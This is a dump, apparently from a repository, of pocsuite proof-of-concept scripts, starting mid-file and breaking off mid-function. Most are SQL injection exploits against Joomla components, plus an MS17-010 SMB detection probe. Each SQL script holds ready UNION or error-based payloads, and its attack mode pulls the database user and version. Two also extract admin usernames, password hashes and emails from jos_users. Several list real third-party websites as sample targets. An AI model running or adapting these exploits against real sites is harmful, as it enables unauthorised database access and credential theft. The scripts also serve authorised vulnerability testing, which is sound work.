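            result['DatabaseInfo']['Username'] = match.group(2)
        return self.parse_output(result)

    def _verify(self):
        """Confirm the injection by looking for md5(1) in the response."""
        result = {}
        resp = self._request(self.VERIFY_PAYLOAD)
        if self.MD5_1 in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + self.EXPLOIT_PATH
            result['VerifyInfo']['Payload'] = self.VERIFY_PAYLOAD
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output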
91 |
92 |
93 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component com_doqment (cid) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """UNION-based SQL injection in the Joomla! ``com_doqment`` component.

    The ``cid`` parameter is injected with an 8-column UNION whose third
    column is echoed.  ``_verify`` places ``md5(1)`` there; ``_attack`` places
    ``concat(version(), user())`` between hex-encoded delimiters and parses
    the two values back out.
    """
    vulID = '67389'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-01-03'
    createDate = '2016-01-15'
    updateDate = '2016-01-15'
    references = ['http://www.sebug.net/vuldb/ssvid-67389']
    name = 'Joomla Component com_doqment (cid) SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component com_doqment'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
    Joomla Component com_doqment的参数cid过滤不严格,导致出现SQL注入漏洞。
    远程攻击者可以利用该漏洞执行任意SQL指令,获取敏感信息。
    '''
    samples = ['http://www.ecosys-tec.com','http://novocement.ru',]

    EXPLOIT_PATH = '/index.php?option=com_doqment&cid='
    # 0x247e7e7e24 = '$~~~$', 0x2a2a2a = '***' (delimiters around the values).
    ATTACK_PAYLOAD = ("-11/**/union/**/select/**/1,2,concat(0x247e7e7e24,version(),"
                      "0x2a2a2a,user(),0x247e7e7e24),4,5,6,7,8--")
    VERIFY_PAYLOAD = '-11/**/union/**/select/**/1,2,md5(1),4,5,6,7,8--'
    MARKER = '$~~~$'
    # md5(1) as rendered by MySQL.
    MD5_1 = 'c4ca4238a0b923820dcc509a6f75849b'
    # Group 1 = version(), group 2 = user().
    INFO_RE = re.compile(r"\$~~~\$([0-9a-zA-Z_].*)\*\*\*([0-9a-zA-Z_].*)\$~~~\$", re.I | re.M)
    HEADERS = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Connection': 'keep-alive'
    }
    TIMEOUT = 50

    def _request(self, payload):
        """GET the injection URL with ``payload`` appended to cid."""
        return req.get(url=self.url + self.EXPLOIT_PATH + payload,
                       headers=self.HEADERS, timeout=self.TIMEOUT)

    def _attack(self):
        """Extract database version and user through the echoed column."""
        result = {}
        resp = self._request(self.ATTACK_PAYLOAD)
        if self.MARKER not in resp.content:
            return self.parse_output(result)
        match = self.INFO_RE.search(resp.content)
        if match:
            result['DatabaseInfo'] = {
                'Version': match.group(1),
                'Username': match.group(2),
            }
        return self.parse_output(result)

    def _verify(self):
        """Confirm the injection by looking for md5(1) in the response."""
        result = {}
        resp = self._request(self.VERIFY_PAYLOAD)
        if self.MD5_1 in resp.content:
            result['VerifyInfo'] = {
                'URL': self.url + self.EXPLOIT_PATH,
                'Payload': self.VERIFY_PAYLOAD,
            }
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
91 |
92 |
93 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component JE Event Calendar SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """UNION-based SQL injection in the Joomla! JE Event Calendar component.

    The ``event_id`` parameter of ``view=event`` is closed with ``"`` and
    injected with an 11-column UNION whose second column is echoed.
    ``_verify`` places ``md5(1)`` there; ``_attack`` places
    ``concat(user(), version())`` between hex-encoded delimiters and parses
    the two values back out.
    """
    vulID = '67594'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-03-02'
    createDate = '2016-01-05'
    updateDate = '2016-01-05'
    references = ['http://www.sebug.net/vuldb/ssvid-67594']
    name = 'Joomla Component JE Event Calendar SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.com'
    appName = 'Joomla Component JE Event Calendar'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
    Joomla!的组件JE Event Calendars (com_jeeventcalendar)存在SQL注入漏洞。
    远程攻击者可以借助脚本index.php中的事件操作的event_id参数,执行任意的SQL命令。
    '''
    samples = ['http://starstudentcard.com']

    EXPLOIT_PATH = '/index.php?option=com_jeeventcalendar&view=event&Itemid=155&event_id='
    # %22 = '"', %23 = '#'; 0x247e7e7e24 = '$~~~$', 0x2a2a2a = '***'.
    ATTACK_PAYLOAD = ("-1%22+UNION+ALL+SELECT+1,concat(0x247e7e7e24,user(),0x2a2a2a,"
                      "version(),0x247e7e7e24),3,4,5,6,7,8,9,10,11%23")
    VERIFY_PAYLOAD = "-1%22+UNION+ALL+SELECT+1,md5(1),3,4,5,6,7,8,9,10,11%23"
    # md5(1) as rendered by MySQL.
    MD5_1 = 'c4ca4238a0b923820dcc509a6f75849b'
    # Group 1 = user(), group 2 = version().
    INFO_RE = re.compile(r'\$~~~\$(.*)\*\*\*(.*)\$~~~\$', re.M | re.I)
    HEADERS = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Connection': 'keep-alive'
    }
    TIMEOUT = 50

    def _request(self, payload):
        """GET the injection URL with ``payload`` appended to event_id."""
        return req.get(url=self.url + self.EXPLOIT_PATH + payload,
                       headers=self.HEADERS, timeout=self.TIMEOUT)

    def _attack(self):
        """Extract database user and version through the echoed column."""
        result = {}
        resp = self._request(self.ATTACK_PAYLOAD)
        if resp.status_code != 200:
            return self.parse_output(result)
        match = self.INFO_RE.search(resp.content)
        if match:
            result['DatabaseInfo'] = {
                'Username': match.group(1),
                'Version': match.group(2),
            }
        return self.parse_output(result)

    def _verify(self):
        """Confirm the injection by looking for md5(1) in the response."""
        result = {}
        resp = self._request(self.VERIFY_PAYLOAD)
        if self.MD5_1 in resp.content:
            result['VerifyInfo'] = {
                'URL': self.url + self.EXPLOIT_PATH,
                'Payload': self.VERIFY_PAYLOAD,
            }
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
92 |
93 |
94 | register(TestPOC)
--------------------------------------------------------------------------------
/_170605_SMB_ms17_010_RCE.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # @Author : jeffzhang
4 | # @Time : 2018/04/19
5 | # @File : _170605_SMB_ms17_010_RCE.py
6 | # @Desc : ""
7 |
8 | import binascii
9 | import socket
10 | from pocsuite.api.poc import register
11 | from pocsuite.api.poc import Output, POCBase
12 |
13 |
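class TestPOC(POCBase):
    """MS17-010 (SMBv1) vulnerability check.

    Although tagged ``vulType = 'RCE'`` this POC only detects: it walks the
    SMB1 Negotiate -> Session Setup -> Tree Connect (IPC$) sequence and then
    sends a Trans request with the PeekNamedPipe subcommand on FID 0 over
    ``\\PIPE\\``.  The original POC treats NT status 0xC0000205
    (STATUS_INSUFF_SERVER_RESOURCES) in the reply as the vulnerability
    indicator.  Nothing is executed on the target.  Python 2 byte-string
    handling (``str.encode('hex')``) is kept from the original.
    """
    vulID = '00005'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-05-12'
    createDate = '2018-04-19'
    updateDate = '2018-04-19'
    references = ['']
    name = 'MS17-010 SMB 远程命令执行漏洞'
    appPowerLink = 'https://www.microsoft.com'
    appName = 'SMB Server'
    appVersion = 'All'
    vulType = 'RCE'
    desc = '''
    SMB Server存在多个远程执行代码漏洞 成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力
    '''
    samples = ['']

    DEFAULT_PORT = 445
    SOCKET_TIMEOUT = 5
    # SMB1 Negotiate Protocol Request offering LANMAN1.0, LM1.2X002,
    # NT LANMAN 1.0 and NT LM 0.12.
    NEGOTIATE_PROTOCOL_REQUEST = binascii.unhexlify(
        "00000054ff534d4272000000001801280000000000000000000000000000"
        "2f4b0000c55e003100024c414e4d414e312e3000024c4d312e3258303032"
        "00024e54204c414e4d414e20312e3000024e54204c4d20302e313200")
    # SMB1 Session Setup AndX Request (null session, "Windows 2000 2195").
    SESSION_SETUP_REQUEST = binascii.unhexlify(
        "00000063ff534d42730000000018012000000000000000000000000000002f4b0"
        "000c55e0dff000000dfff02000100000000000000000000000000400000002600"
        "002e0057696e646f7773203230303020323139350057696e646f7773203230303"
        "020352e3000")
    # Trans request: SetupCount 2, setup[0] = 0x0023 (PeekNamedPipe), FID 0,
    # name "\PIPE\".  %s receives TID/PID/UID/MID copied from the tree
    # connect response.
    PEEK_NAMED_PIPE_TMPL = (
        "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff000000000000000000"
        "0000004a0000004a0002002300000007005c504950455c00")
    # Little-endian 0xC0000205 (STATUS_INSUFF_SERVER_RESOURCES).
    VULN_STATUS = "\x05\x02\x00\xc0"

    @staticmethod
    def _target(url):
        """Split ``url`` into ``(host, port)``; the port defaults to 445.

        Accepts ``host``, ``host:port`` and ``scheme://host[:port][/path]``.
        The original split on ':' and indexed [1], which raised IndexError
        for a bare host and kept any path that followed the port.
        """
        netloc = url.split('://', 1)[-1].split('/', 1)[0]
        host, sep, port = netloc.rpartition(':')
        if sep and port.isdigit():
            return host, int(port)
        return netloc, TestPOC.DEFAULT_PORT

    @staticmethod
    def _tree_connect_request(user_id, target_ip):
        """Build the TREE_CONNECT_ANDX request for ``\\\\<ip>\\IPC$``.

        ``user_id`` is the 2-byte UID from the session setup reply.  Both
        length fields are computed: the NetBIOS length is 58 + len(ip) and
        the SMB ByteCount is password(1) + path + NUL + "?????" + NUL =
        len(ip) + 15.  The original hard-coded ByteCount 0x001a, which is
        only correct for an 11-character host string.
        """
        byte_count = len(target_ip) + 15
        request = (
            "00%06xff534d42750000000018012000000000000000000000000000002f4b%sc55e04ff00"
            "000000000100%02x%02x005c5c%s5c49504324003f3f3f3f3f00") % (
                58 + len(target_ip), user_id.encode('hex'),
                byte_count & 0xff, (byte_count >> 8) & 0xff, target_ip.encode('hex'))
        return binascii.unhexlify(request)

    def _verify(self):
        """Run the SMB1 handshake and probe; report if the vulnerable status comes back."""
        result = {}
        target_ip, target_port = self._target(self.url)
        sock = None
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.SOCKET_TIMEOUT)
            sock.connect((target_ip, target_port))
            sock.sendall(self.NEGOTIATE_PROTOCOL_REQUEST)
            sock.recv(1024)
            sock.sendall(self.SESSION_SETUP_REQUEST)
            data = sock.recv(1024)
            # UID is at bytes 32:34 (4-byte NetBIOS header + SMB header
            # offset 28); a reply shorter than that cannot be used.
            if len(data) < 36:
                return self.parse_attack(result)
            sock.sendall(self._tree_connect_request(data[32:34], target_ip))
            data = sock.recv(1024)
            if len(data) < 36:
                return self.parse_attack(result)
            # TID, PID, UID, MID exactly as the server returned them.
            payload = self.PEEK_NAMED_PIPE_TMPL % data[28:36].encode('hex')
            sock.sendall(binascii.unhexlify(payload))
            data = sock.recv(1024)
            if self.VULN_STATUS in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload[:20]
                result['VerifyInfo']['result'] = data[:20]
        except Exception:
            # Best effort: connection refused, timeout or a malformed reply
            # all mean "not confirmed", never a crash of the scan.
            pass
        finally:
            # The original closed the socket only on the success path.
            if sock is not None:
                sock.close()
        return self.parse_attack(result)

    def _attack(self):
        """No exploitation step is implemented; reuse the check."""
        return self._verify()

    def parse_attack(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output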
86 |
87 |
88 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC descriptor: Joomla com_timereturns 2.0 ``id`` parameter SQL injection (SSV-72200).

    The class attributes below are framework metadata; the probe logic lives
    in ``_attack`` / ``_verify`` further down the file.
    """
    vulID = '72200' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-11-29'
    createDate = '2016-01-10'
    updateDate = '2016-01-10'
    references = ['http://www.sebug.net/vuldb/ssvid-72200']
    name = 'Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection'
    appPowerLink = 'http://www.joomla.com'
    appName = 'Joomla Time Returns Component'
    appVersion = '2.0'
    vulType = 'SQL Injection'
    # Runtime string (Chinese description); left verbatim, it is data not a comment.
    desc = '''
Joomla!的Time Returns(com_timereturns)组件2.0版本中存在SQL注入漏洞。
主要是对参数id过滤不严格造成的,远程攻击者可借助id参数执行任意SQL命令。
'''
    # Example hosts recorded by the original author; nothing in this file reads them.
    samples = ['http://www.110xo.com/page/service']
26 |
def _attack(self):
    """Attack mode: error-based extraction of the DB user and MySQL version.

    One GET is sent to the com_timereturns ``id`` parameter. If the body
    contains MySQL's 'Duplicate entry' error text, the user()/version()
    values echoed between the ``$~~~$`` and ``***`` delimiters are parsed into
    ``result['DatabaseInfo']``; otherwise ``result`` stays empty and
    ``parse_output`` reports failure. Exceptions from ``req.get`` propagate.
    """
    result = {}
    # Error-based (floor/RAND duplicate-key) payload; 0x247e7e7e24 / 0x2a2a2a
    # are the '$~~~$' and '***' delimiters the regex below keys on.
    payload="1' AND (SELECT 1222 FROM(SELECT COUNT(*),"\
    "CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,"\
    "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
    exploit="/index.php?option=com_timereturns&view=timereturns&id="
    # Extraction regex. NOTE(review): not a raw string -- '\$' and '\*' are
    # unknown escapes (kept literally on Python 2, a warning on 3.12+); r'...'
    # is the intended form. Greedy '.*' can over-match if the delimiters occur
    # more than once in the page.
    pars="\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Signal: MySQL duplicate-key error text in the body. Assumes resp.content
    # is a str (Python 2); on Python 3 bytes this comparison would raise -- TODO confirm runtime.
    if 'Duplicate entry' in resp.content:
        match=re.search(pars,resp.content,re.I|re.M)
        if match:
            result['DatabaseInfo']={}
            # group(1) = user(), group(2) = version()
            result['DatabaseInfo']['Username']=match.group(1)
            result['DatabaseInfo']['Version']=match.group(2)
    return self.parse_output(result)
58 |
def _verify(self):
    """Verify mode: same error-based probe, echoing md5(1) instead of DB data.

    Success is declared only when the literal md5(1) digest
    (c4ca4238a0b923820dcc509a6f75849b) appears in the response body; no table
    data is read. On success ``result['VerifyInfo']`` records the URL and payload.
    """
    result = {}
    # Error-based (floor/RAND duplicate-key) payload carrying md5(1) as the marker.
    payload="1' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),"\
    "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_timereturns&view=timereturns&id='
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout; exceptions propagate.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Detection marker: md5(1) == c4ca4238a0b923820dcc509a6f75849b
    # (assumes str resp.content, i.e. Python 2 -- TODO confirm).
    if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL'] = self.url+exploit
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
84 |
def parse_output(self, result):
    """Build the framework Output: success carrying ``result`` when non-empty, else a fixed failure."""
    output = Output(self)
    if not result:
        output.fail('Internet nothing returned')
        return output
    output.success(result)
    return output
93 |
94 |
95 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC descriptor: Joomla Ignite Gallery 0.8.3 ``gallery`` parameter SQL injection (SSV-65822).

    Class attributes are framework metadata; probe logic is in ``_attack`` / ``_verify``.
    """
    vulID = '65822' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2009-02-19'
    createDate = '2016-01-20'
    updateDate = '2016-01-20'
    references = ['http://www.sebug.net/vuldb/ssvid-65822']
    name = 'Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component Ignite Gallery'
    appVersion = '0.8.3'
    vulType = 'SQL Injection'
    # Runtime string (Chinese description); left verbatim.
    desc = '''
Ignite Gallery (com_ignitegallery)组件0.8.0版本至0.8.3版本中存在SQL注入漏洞,
远程攻击者可以借助对index.php的一个图像操作中的gallery参数,执行任意SQL指令。
'''
    # Example hosts recorded by the original author; nothing in this file reads them.
    samples = ['http://www.crnm.org','http://www.bike-and-run.com']
26 |
def _attack(self):
    """Attack mode: UNION-based read of the first ``jos_users`` row.

    One GET is sent to the com_ignitegallery ``gallery`` parameter. If the
    ``$~~~$`` delimiter appears in the body, username / password column /
    email are parsed into ``result['AdminInfo']``; otherwise ``result`` stays
    empty and ``parse_output`` reports failure. Exceptions from ``req.get`` propagate.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_ignitegallery&task=view&gallery='
    # UNION payload (10 columns); 0x247e7e7e24 / 0x2a2a2a are the '$~~~$' and
    # '***' delimiters the regex below keys on.
    payload="-1 union select 1,2,concat(0x247e7e7e24,username,0x2a2a2a,"\
    "password,0x2a2a2a,email,0x247e7e7e24),4,5,6,7,8,9,10 from jos_users limit 0,1--"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Extraction regex (three groups). NOTE(review): not a raw string -- '\$'
    # and '\*' are unknown escapes; r'...' is the intended form. Greedy '.*'
    # can over-match if the delimiters occur more than once in the page.
    parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
    # Single request, 50 s timeout.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Signal: the '$~~~$' delimiter echoed in the body (assumes str
    # resp.content, i.e. Python 2 -- TODO confirm runtime).
    if '$~~~$' in resp.content:
        match=re.search(parttern,resp.content,re.M|re.I)
        if match:
            result['AdminInfo']={}
            # group(1) username, group(2) password column, group(3) email
            result['AdminInfo']['Username']=match.group(1)
            result['AdminInfo']['Password']=match.group(2)
            result['AdminInfo']['Email']=match.group(3)
    return self.parse_output(result)
61 |
def _verify(self):
    """Verify mode: UNION probe echoing md5(3.1415) instead of table data.

    Success is declared only when the literal digest
    (63e1f04640e83605c1d177544a5a0488) appears in the response body. On
    success ``result['VerifyInfo']`` records the URL and payload.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_ignitegallery&task=view&gallery='
    # UNION payload (10 columns) with md5(3.1415) as the marker.
    payload="-1 union select 1,2,md5(3.1415),4,5,6,7,8,9,10--"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout; exceptions propagate.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Detection marker: md5(3.1415) == 63e1f04640e83605c1d177544a5a0488
    # (assumes str resp.content, i.e. Python 2 -- TODO confirm).
    if '63e1f04640e83605c1d177544a5a0488' in resp.content:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL'] = self.url+exploit
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
86 |
def parse_output(self, result):
    """Build the framework Output: success carrying ``result`` when non-empty, else a fixed failure."""
    output = Output(self)
    if not result:
        output.fail('Internet nothing returned')
        return output
    output.success(result)
    return output
95 |
96 |
97 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla RSfiles Component (cid param) - SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC descriptor: Joomla RSfiles ``cid`` parameter SQL injection (SSV-78538).

    Class attributes are framework metadata; probe logic is in ``_attack`` / ``_verify``.
    """
    vulID = '78538' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2013-03-18'
    createDate = '2016-01-23'
    updateDate = '2016-01-23'
    references = ['http://www.seebug.org/vuldb/ssvid-78538']
    name = 'Joomla RSfiles Component (cid param) - SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla RSfiles Component'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    # Runtime string (Chinese description); left verbatim.
    desc = '''
joomla组件RSfiles由于对参数cid过滤不严格,导致出现SQL注入漏洞。
远程攻击者可以利用该漏洞执行SQL指令。
'''
    # Example host recorded by the original author; nothing in this file reads it.
    samples = ['http://www.ccdwoll.org.au/ccd']
26 |
def _attack(self):
    """Attack mode: UNION-based read of ``jos_users`` rows.

    One GET is sent to the com_rsfiles ``cid`` parameter. If the ``$~~~$``
    delimiter appears in the body, username / password column / email are
    parsed into ``result['AdminInfo']``; otherwise ``result`` stays empty and
    ``parse_output`` reports failure. Exceptions from ``req.get`` propagate.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid='
    # UNION payload; delimiters are built with CHAR() instead of hex literals
    # and keywords are split with inline comments / mixed case (as in the
    # original). CHAR(36,126,126,126,36) is '$~~~$', CHAR(42,42,42) is '***'.
    payload="-1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat(CHAR(36, 126, 126, 126, 36),username,"\
    "CHAR(42, 42, 42),password,CHAR(42, 42, 42),email,CHAR(36, 126, 126, 126, 36))/**/from/**/jos_users--"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Extraction regex (three groups). NOTE(review): not a raw string -- '\$'
    # and '\*' are unknown escapes; r'...' is the intended form. Greedy '.*'
    # can over-match when several rows are echoed (no LIMIT in the payload).
    parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
    # Single request, 50 s timeout.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Signal: the '$~~~$' delimiter echoed in the body (assumes str
    # resp.content, i.e. Python 2 -- TODO confirm runtime).
    if '$~~~$' in resp.content:
        match=re.search(parttern,resp.content,re.M|re.I)
        if match:
            result['AdminInfo']={}
            # group(1) username, group(2) password column, group(3) email
            result['AdminInfo']['Username']=match.group(1)
            result['AdminInfo']['Password']=match.group(2)
            result['AdminInfo']['Email']=match.group(3)
    return self.parse_output(result)
61 |
def _verify(self):
    """Verify mode: UNION probe echoing md5(3.1415) instead of table data.

    Success is declared only when the literal digest
    (63e1f04640e83605c1d177544a5a0488) appears in the response body. On
    success ``result['VerifyInfo']`` records the URL and payload.
    """
    result = {}
    # Vulnerable endpoint/parameter.
    exploit='/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid='
    # UNION payload (same comment/case obfuscation as _attack) with md5(3.1415) as the marker.
    payload="-1/**/aNd/**/1=0/**/uNioN++sElecT+1,md5(3.1415)--"
    # Payload is concatenated onto the URL without encoding.
    vulurl=self.url+exploit+payload
    # Browser-like request headers.
    httphead = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection':'keep-alive'
    }
    # Single request, 50 s timeout; exceptions propagate.
    resp=req.get(url=vulurl,headers=httphead,timeout=50)
    # Detection marker: md5(3.1415) == 63e1f04640e83605c1d177544a5a0488
    # (assumes str resp.content, i.e. Python 2 -- TODO confirm).
    if '63e1f04640e83605c1d177544a5a0488' in resp.content:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL'] = self.url+exploit
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
86 |
def parse_output(self, result):
    """Build the framework Output: success carrying ``result`` when non-empty, else a fixed failure."""
    output = Output(self)
    if not result:
        output.fail('Internet nothing returned')
        return output
    output.success(result)
    return output
95 |
96 |
97 | register(TestPOC)
--------------------------------------------------------------------------------
/HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
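class TestPOC(POCBase):
    """pocsuite PoC descriptor: Joomla HD FLV Player (com_hdflvplayer) ``id`` parameter SQL injection (SSV-86873).

    Class attributes are framework metadata; probe logic is in ``_attack`` / ``_verify``.
    """
    vulID = '86873' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-04-13'
    createDate = '2016-01-27'
    updateDate = '2016-01-27'
    references = ['http://www.seebug.org/vuldb/ssvid-86873']
    # Fix: the original wrapped 'id' in unescaped single quotes inside a
    # single-quoted literal, which is a SyntaxError and kept the module from
    # importing at all. Double quotes keep the same text.
    name = "HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability"
    appPowerLink = 'http://www.joomla.org'
    appName = 'HD FLV Player Component for Joomla!'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    # Runtime string (Chinese description); left verbatim.
    desc = '''
Joomla!是一款开放源码的内容管理系统(CMS)。
Joomla!的组件HD FLV Player (com_hdflvplayer)存在SQL注入漏洞。
远程攻击者可以利用脚本index.php的id执行任意的SQL指令。
'''
    # Example host recorded by the original author; nothing in this file reads it.
    samples = ['http://zeweldfc.com']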
27 |
def _attack(self):
    """Attack mode: error-based extraction of the DB user and MySQL version.

    One GET is sent to the com_hdflvplayer ``id`` parameter. If the body
    contains MySQL's 'Duplicate entry' error text, the user()/version()
    values echoed between the ``$~~~$`` and ``***`` delimiters are parsed into
    ``result['DatabaseInfo']``; otherwise ``result`` stays empty and
    ``parse_output`` reports failure. Exceptions from ``req.get`` propagate.
    """
    result = {}
    # Error-based (floor/RAND duplicate-key) payload; 0x247e7e7e24 / 0x2a2a2a
    # are the '$~~~$' and '***' delimiters the regex below keys on.
    payload=("1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT"
    "(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,"
    "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- -")
    exploit="/index.php?option=com_hdflvplayer&id="
    # Extraction regex. NOTE(review): not a raw string -- '\$' and '\*' are
    # unknown escapes; r'...' is the intended form. Greedy '.*' can over-match
    # if the delimiters occur more than once in the page.
